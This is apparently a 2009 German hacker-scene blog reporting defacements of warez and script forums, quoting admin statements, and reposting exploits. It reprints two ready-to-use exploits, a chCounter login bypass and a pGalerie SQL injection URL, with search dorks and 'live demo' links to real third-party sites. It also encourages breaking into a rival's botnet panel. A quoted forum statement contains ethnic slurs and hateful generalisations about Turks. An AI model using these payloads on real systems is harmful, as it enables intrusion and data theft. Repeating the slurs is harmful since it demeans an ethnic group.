J0hn.X3r

.. wuerde hoohead nun sagen 😀

Gestern am 17.04.2009 war anscheinend einiges los. Scriptload wurde “im namen von The Don” (ein Admin aus scriptzbase.org) defaced. War er natuerlich nicht, wie man sehen kann. Sowas wuerde er nie schreiben.

–>

Quelle & mehr: http://newsbox.cc/hacked-ddosed-defaced/scriptload-gehackt/

Dann folgte wieder eine Seite, diesmal undergroundimagez ein Projekt von The Don.

–>

Quelle & mehr: http://newsbox.cc/hacked-ddosed-defaced/undergroundimagez-gehackt/

Und da alle guten Dinge 3 sind, hat es danach nochmal eine große Seite getroffen, naemlich Scriptzbase.org – Admins sind dort Pyth@n und The Don.

Hier nochmal zuerst das kleine Statement:

Leider wurden wir die Nacht Opfer eines Hack-Angriffs
Wir bleiben nun doch erstmal Offlin bis zur klärung
Dann erstmal sehen wie es weiter geht und ob es überhaupt weiter geht

Fuck of Türke

Es ist doch immer wieder schade wie sich die scheiß Szene selber wenichten tut, Kinder übernehmen die Szene immer mehr

Scriptzbase.org hat nicht mit dem hack-Angriff auf Scriptload zu tun.

Und dann das etwas groessere:

Mehr pech kann man glaubich nicht haben, erst läuft alles schief bezüglich des Umzugs.
Dateiload nimmt unseren root vom Netz, ohne uns den neuen zur verfügung zu stellen, dann sollen wir 1 1/2 – 2 Wochen warten,
bis der neue da ist. Darauf hatten wir aber kein bock, The Don hat stress geschoben, da wir ein reibunglosen Umzug haben wollten.
Dann stellte Dateiload uns den ALTEN wieder hin. Wegen dem Stress nahm man uns den Account Manager (zurecht), jetzt sollen wir den jetztigen root kündigen bevor wir den neuen bekommen *lol*.

In der Nacht zum 17.02 wurde ScriptzBase Opfer eines Hack-Angriffes, wie dies passiert ist, wissen wir selber noch nicht!.
Fest steht, es waren wie immer diese kleine mießen Türken. Diese Kündigen an ein Backup Online zu stellen.

Auch Speedtest von 1337-Crew versuchte uns zu Hacken, durch eine Lücke in VB trug er eine E-Mail adresse in die Administratoren Accounts ein, die damals noch zur seiner Seite heihachi.net führte.
vermutlich weil ich heihachi.net als inkompetenter Hoster bezeichnete und diesen Hoster auf ScriptzBase Zensur.
Wo ich mit Account-Shop drauf gehostet habe, war meine Seite mehr down als alles andere. Hosting ist kein Kuchenbacken.

Wie es jetzt weiter geht weiß ich noch nicht, ich habe ehrlich keine lust mehr auf ScriptzBase.
Wir stellen User vieles KOSTENLOS zur verfügung, geben monatlich viel Geld für den scheiß root aus, seid es ScriptzBase gibt habe ich schon über 3000€ dafür aus gegeben.
Wozu dies alles?, für diese scheiß Szene, die nur nimmt und nichts gibt, für User die auf ScriptzBase aktiv leechen, aber Scriptzbase hassen tun, und alles daran setzen uns zu schaden, uns mit Füßen Größe 52 treten!.

Aber Ihr habt ja noch eure Englischen freunde, die Deutsche Szene wird immer mehr verschwinden, und das nur wegen dummen Leuten,
die meinen, sich beweisen zu müssen und mehr schaden anrichten als sie gutes tun.
Solche dummen Menschen werden dann auch noch bejubelt wie (Saddam Hussein) der alles in namen Allah tut!*Lach*,
damit diese sich freuen können.
Die Türkischen hacker denken Sie tuen alles für Allah, denken wenn sie Terror laufen, Seiten hacken das diese gutes tun *Pfff*.
Sobald man eine Türkische Seite hacken tut, laufen diese Terror und töten Menschen, wir Deutschen essen doch lieber Kartoffeln!
Türken schaden mehr das Internet als jedes andere Volk, sie verstehen nicht wofür Gemeindschaft steht, Freude, Spass, Freundschaft.

Bald wird es bestimmt noch eine Deutsche Script Seite geben, die aber auch schnell offline geht *lach*
Ist das schön wenn dumme leute sich selber ins Bein schießen, das auch noch toll finden.

Mein motto war immer “Hack niemals Szene Seiten, es sei denn die sachden dich selber massiv” vTeam-Germany wurde damals von mir gehackt, weil dies zutraf, nicht OHNE grund.

Leute mögen mich “PyTh@n” nicht weil die mich nicht kennen, Sie Urteilen über mich einfach, erzählen scheiße, machen mit meinen Nick irgend eine scheiße auf andere Seiten. Und jetzt kommen die ganzen Kinder aus den löchern die meinen etwas über SB zu wissen, erzählen irgend eine scheiße, wissen nichtmal was diese damit selber bezwecken wollen.

Ich werde die nächsten Tage darüber nachdenken, ob es sich noch lohnt die ganze scheiße für Leute zu machen die dich doch eigl hassen, die dir schaden wollen!.
Ob sich das lohnt, Monat für Monat gedanken zu machen woher ich das Geld für den root nehme.
Ob sich das Lohnt evtl meine zukunft durch Warez zu versauen.
Ob sich der ganze Stress und ärger Lohnt!.

In dem ScriptzBase Backup stehen IP-Adresse der User drinne, es ging einfach nicht mehr ohne logging, die User haben zu viel scheiße gebaut, wollten schaden anrichten.
Auch wenn wir auf Sicherheit der User achteten mussten wir auch selber auf Unsere achten, IP logging wollten wir nach dem Umzug Temporary machen, dazu kam es aber leider nicht mehr.
Uns war immer klar das das BKA niemals an unseren root kommen würde, wenn dann wäre alles ganz schnell weg;)
User müssen aber keine Angst haben vor Besuch des BKA;), wer sich gedanken macht, macht sich lächerlich;).

Auf diesen wegen Sorry für das Loggen, in der Szene geht es leider nicht mehr OHNE. 1337 macht es selber nicht anderes!.

Wie gesagt wir wissen nicht ob es überhaupt weiter geht, ich werde die Tage darüber nach denken.
Ich werde nur auf Diskussionen im Newsbox.cc Forum antworten.

Die ScriptzBase Administration
PyTh@n

E-Mail: [email protected]

PS: ScriptzBase wäre die Tage 2 Jahre geworden!

Quelle: http://scriptzbase.org/

Ich stimme der Aussage von Pyth@n voll und ganz zu und ich denke er hat mit seinem Statement auch recht. Es gibt nur eine positive Sache zu sagen “defaces” sind wenigsten was anderes als langweiliger Dauer DDoS. Deface zeigt naemlich immerhin etwas koennen, was man bei DDoS nicht behaupten kann.

Aufjedenfall hoff ich, dass sich die Admins von Scriptzbase schnell erholen und am Projekt weitermachen.. Scriptzbase war nen tolles Forum. 🙂

Was gibts sonst noch interessantes zu berichten.. ah -tmh- hat mal wieder nen Exploit auf milw0rm veroeffentlicht, es handelt sich mal wieder um einen Login Bypass, sehr gefaehrlich das ganze, da man innerhalb von sekunden und ohne große Anstrengung zum Admin werden kann:

########################################################################################################################
#chCounter 3.1.3 Login Bypass
#=======================================================================================================================
#
#Critical Level : Dangerous
#
#Vendor site : http://chcounter.org/
#
#Download : http://chcounter.org/chCounter3/getfile.php?id=5
#
#dorks: "chCounter 3.1.3" Künftig automatisch einloggen or "chCounter 3.1.3"
#
#=======================================================================================================================
#
#
#Information :
#--------------------------------
#Need: magic quotes = off
#
#Exploit :
#--------------------------------
#
#http://www.[URL]//counter/stats/index.php
#
#Use or '=' as username and password
#
#
#Live demo :
#--------------------------------
#
#http://www.brummelliese.de/count/stats/
#http://www.fire.uni-freiburg.de/counter/welcome/stats/
#
#=======================================================================================================================
#Discovered by : -tmh- & Lainux
#
#Contact : tmh[at]sys-flaw.com
#
#Greetz to : n00bor , activebeta, Five-Three-Nine ,GabberGandalf, J0hn.X3r , electron1x , Lainux, PurpleD1amond , Sebo , Z1uX , meckl , Floo , -Patrick_B ,
#abcdef ,Loader007 , bizzit , Barbers , dev0815 , f0Gx , h0yt3r , Nemo , eddy14 , Sys-Flaw , Codesoft ,Free-Hack
#
#
########################################################################################################################

# milw0rm.com [2009-04-16]

Quelle: http://www.milw0rm.com/exploits/8461

Danke nochmal fuer das Erwaehnen in den Greetz 🙂

Was gibts noch aktuelles zu sagen? Vorerst nichts, wird jedoch heute noch etwas folgen 🙂

Aloha zu meiner 3ten Wochenuebersicht. Heute fasse ich mich kurz, da ich erst in 2 Tagen Ferien hab, und dann auch mehr Zeit zum Bloggen finde. Sind in letzter Zeit weniger schoene Dinge passiert, aber nun gut.

Fangen wir an. Punkt 1: Es geht mal wieder um das tolle Elite Scene Board No. 1 von luppa, auch bekannt als “Dark Matrix”. Hatte schon mehrmals von ihnen berichtet, nun kommen noch 2 Knueller:

Dark Matrix Forum wurde innerhalb von 3 Wochen nun zum 2ten Mal defaced, diesmal von T-Slide, Admin von Pro-Hack.eu, am 1. April 2009:

Wenn man sich die Signatur von luppa anschaut, sieht man gleich den Knueller Nr.2: “King of Botnet”. Der Trottel nennt sich “King Of Botnet” welches sich hier befindet: http://dark-matrix.com/botnet/ UND nicht mehr als 200 – 600 Bots hat.. das nenn ich KING! Diese Person ist sowas von laecherlich.. Vllt kann sich ja jemand den Zugang erbruten oder findet luecken.. ich wuerd alle Vics loeschen..

Punkt 2: Der 1. April war nen “unterhaltsamer” Tag, an dem einige Leute witzig sein wollten. Hier nen paar Auszuege:

– xREL.to machte einen auf “hacked” und stellte die komplette Seite in 1337 “Schrift” dar

– scriptzbase.org machte einen auf hacked/defaced und dabei wurde dann auch eine Handynummer von Pyth@n (glaub ich) und die DB von account-shop.ws veroeffentlicht, war aber schlussendlich nen großer Spaß (siehe http://scriptzbase.org/showthread.php?t=24012 )

– Kartoffel-Hack Source wurde von -tmh- veroeffentlicht jedoch mit einem (anscheinend) 97 stelligem PW 😀 Viel Spaß beim Bruteforce^^

– gulli hatte auch was gebracht, weiß aber grad nicht genau mehr was

Und najo noch einige mehr.

Punkt 3: Sebo hat sein 2filehost Projekt nun unter neuem Namen wieder geboren, naemlich  LoadNow.in. Ist wie 2filehost.cn damals, nen Premium Link Generator gewesen, nur diemal (Achtung Neu!) mit Megaupload 🙂 Er plant auch eventuell Uploaded.to dazu zu nehmen. Und ich weiß durch sichere Quellen, dass sein Projekt morgen auf eine neue Server Hardware umsteigen wird, um bessere Performance zu bieten. Was gibts noch groß zu sagen? Ah eine Aktion, welche ich ganz gut finde:

Punkt 4:

tr4st.NET against YouTube Spreader

Eine echt tolle Aktion. Auf tr4st.NET stellt tr4st ein paar YouTube Videos vor, mit einem anscheinenden “Easy Steam Account Hacker” oder aehnliches, bei dem Ahnungslose Leute “verarscht” werden und dann schlussendlich ihren Steam Account durch diese infizierten Tools verlieren. Ich find die Aktion echt gut, dass tr4st hier die Videos / Downloads aufdeckt und zeigt, dass es infiziert ist und wo die Logs dann landen.

Punkt 5: Scene Coderz.com sagt Ade. Ein kleiner Ausschnitt aus dem Statement:

Heute Abend ist das Fass einfach übergelaufen!

Nein es hat nichts mit dem DDoS zu tun, der täglich auf unseren Server einprasselte, auch nicht mit den Beleidigungen, welche ich täglich erntete und auch nicht weil es mir zu viel Arbeit gemacht hat Spam zu löschen, die Projekte zu verwalten oder Kunden zu supporten. Nein, irgendwo hat es sich eigentlich zu einem Hobby entwickelt und ich muss sagen es war geil mit Euch. Vom Start von DelphiCoderZ bis zum heutigen Ende von SC. Wir waren eine Art große Familie, doch das ist nun Geschichte. Vielen Dank an alle User und Alle die uns immer unterstützt haben. Ich will hier nun keinen genauen Grund angeben wie es dazu kam und hoffe, dass hier Niemand irgendwelchem Müll erzählt (Wir wurden weder Hacked noch busted!).

Bevor auch nur eine Anfrage kommt, ich habe den Usern versprochen, ihre Daten vertraulich zu behandeln, so wird es bleiben!
Es wird hier KEIN Backup verkauft.

ICQ: 218406

Quelle & mehr: SceneCoderZ

Finds echt schade, dass in letzter Zeit immer mehr “Scene” Seiten und Projekte gehen bzw. beendet werden. Vorallem find ich es auch schade und “scheiße”, dass es Leute gibt, die DDoS anbieten, zwar unter dem Vorwand “Scene Seiten werden nicht geDDoSt. Aber anfragen schadet nicht” – Find ich nicht in Ordnung und ich denke die meisten wissen, wen ich damit meine.

Najo das wars soweit erstmal von meiner kleinen Wochenuebersicht, hab noch bis Dienstag Schule und dann endlich Ferien, kann dann wieder etwas aktiver werden 😉

Mal wieder wurde das bekannte Neo-Nazi Forum “Blood and Honour” gehackt bzw. defaced.

Mehr dazu und auch teils Ausschnitte aus Privaten Nachrichten:

http://wikileaks.de/wiki/Blood_and_Honour_international_Neo-Nazi_network_messages_and_passwords,_Mar_2009

Meine Meinung dazu:

Ich find das eigentlich in Ordnung. Es wird zwar nicht sehr viel bringen, aber allgemein betrachtet, wenn man in den Nachrichten aktuell sieht, was die NPD teilweise fuer Aktionen startet und Ziele haben, find ich aufjedenfall nicht in Ordnung.

Auf gulli.com gibts nen netten Artikel bezueglich solche Defaces:

Warum Nazi-Seiten hacken eine Gute Sache ist

Dürfen die das? “…ja, das dürfen die…”

Mehr dazu: http://www.gulli.com/netzwelt/fight-back/naziseiten-defacen/

Die zweite Seite, welche auch vor kurzem “gehackt” wurde, war NFOs.de – auch diese wurden von anderen defaced und x release eintraege durchgefuehrt, mit teilweise Drohungen gegen anderen NFO Seiten.

Die bekannte NFO-Source Seite “German NFO Source” wurde heute Opfer einen Hackangriffes. Die oder der Hacker – die Scene Watchdogs – haben alle Release-Einträge in der Datenbank in “Second.Warning.From.The.Scene.Close.Down.This.Sit e.Or.You.Will.Burn.Same.Goes.for.nfobase.and.xrel-NOTKIDDING 35571″ umgeändert und als Release-Info “By.Scene.Watchdosgs – Fuck You All”.

Mehr dazu: http://newsbox.cc/allgemein/nfosde-gehackt-das-ist-aber-nicht-alles/

Meine Meinung dazu:

Passiert. Jedoch find ich das sinnlos, dass nun einer auf “l33t hacker” mit Drohungen an andere Seiten machen musste. DDL-Warez.org hatte es ja uebrigens auch getroffen.. aber naja ich such mir meine lieblings NFO Page ist und bleibt eh xREL – dann bin ich mal gespannt, ob er die Drohungen war machen laesst 😉 Denke aber eher, da wird nichts kommen..

Nabend,

heute stell ich euch wieder ne kleine Wochenuebersicht vor, bzw. auch News zu meinem Blog.

Punkt 1: Demnaechst werd ich denk ich nen anderes Design nehmen, da mich dieses etwas “stresst”.

Punkt 2: Warum konnte ich in letzter Zeit nicht viel bloggen? – Joa wie das Problem von vielen, eben der Zeitmangel. Hatte heute bzw. gestern erst wieder eine Mathe Arbeit, am Donnerstag folgt Englisch, naechste Woche am Montag Geschichte und am Freitag meine theoretische Fahrpruefung fuer den Fuehrerschein.

Werd also spaetestens dieses WE wieder was posten koennen. Werd daher dise Wochenuebersicht kurz halten und teils Themen dranbringen die alt sind.

Punkt 3:

Wie schon hier zu sehen, hatte ich ja mal das “DarkMatrix” Forum erwaehnt: http://j0hnx3r.org/?p=195 wie schlecht es doch ist usw.. am 15.03.2009 wurde es dann nun defaced (wundert mich nicht), wer es sich anschauen moechte: http://j0hnx3r.org/defaced/darkmatrix/ wenn ich mir denen ihren banner anschau.. 😀 Herrlich, “Hacker Stuff” drunter Pics von Rapidshare, Poison Ivy & Bifrost 😀 Najo so gibts auch immer wieder was zu lachen 😉

Punkt 4:

-tmh- hat nen neues Exploit veroeffentlicht, zumindest auf seinem Blog:

########################################################################################################################
#Powie's pGalerie 1.0 (bild.php) Remote SQL Injection Exploit
#=======================================================================================================================
#
#Critical Level : Dangerous
#
#Vendor site : http://www.powie.de
#
#=======================================================================================================================
#
#
#Exploit :
#--------------------------------
#
#www.[URL]/[PATH]/bild.php?id='+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13/*
#
#Live demo :
#--------------------------------
#
#http://www.fortuna-griesheim.de/mod/galerie/bild.php?id='+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13/*
#
#=======================================================================================================================
#Discovered by : -tmh-
#
#Contact : tmh[at]sys-flaw.com
#
#Greetz to :n00bor , Five-Three-Nine , J0hn.X3r , electron1x , PurpleD1amond , Sebo , Z1uX , meckl , Floo , -Patrick_B ,
#abcdef ,Loader007 , bizzit , Barbers , dev0815 , f0Gx , h0yt3r , Nemo , eddy14 , Sys-Flaw , Codesoft ,Free-Hack
#
#
########################################################################################################################

Danke fuer die Greetz nochmal 🙂

Punkt 5:

Ich hab auf 539 seinem Blog (http://five-three-nine.org) einen Steam PW Decrypter Source fuer C Einsteiger/Anfaenger gesehen, welchen ich nuetzlich finde (bin zwar kein C Coder, aber bin mir sicher das wird dem ein oder anderen helfen) und ahjo mehr dazu hier: http://five-three-nine.org/blog/469/steam-pass-decrypter

Mein 6ter und vorerst letzter Punkt ist, dass am Freitag den 27.03.2009 normalerweise in Stuttgart die ESL Intel Friday Night stattgefunden haette/waere, jedoch nicht stattfinden wird, wie man hier nachlesen kann. Find ich nicht in Ordnung. Klar, einerseits kann ich die Leute verstehen, aber andererseits bringt das kein bisschen etwas.

Das ist wie diese Aktion mit Galeria Kaufhof oder so, welche “Killerspiele” aus dem Sortiment genommen haben. Meine Meinung dazu:
Wer kauf Killerspiele bei Galeria Kaufhof? Keine Sau. Daher haben die es auch nicht als Verlust gesehen und es einfach ausn Sortiment genommen und bei der Presse einen auf Helden gemacht.

Naja ich waere trotzdem gerne zu Intel Friday Night Event gegangen…

Ahjo noch 3 kleinigkeiten:
– Hab den Internet Explorer 8 auf meinem Vista PC installiert, da denkt man da klappt alles und nun ist meine Sidebar futsch.. muss das mal beheben irgendwann wenn ich Zeit hab.

– Hab mir ne neue Maus gekauft, ROCCAT Krone, sieht echt nice aus und ist gut 🙂 Empfehlenswert! 😀

– Nvidia hat neuen Grafikkarten Treiber raus: “Nvidia GeForce-Treiber 182.46 Beta für Vista und XP” *klick*

So das wars nun erstmal soweit von mir, nun ist es 1 Uhr und ich muss frueh aufstehen, ahja am WE folgt vllt nen kleines LFI Tut ueber eine andere Methode als die letzte 😉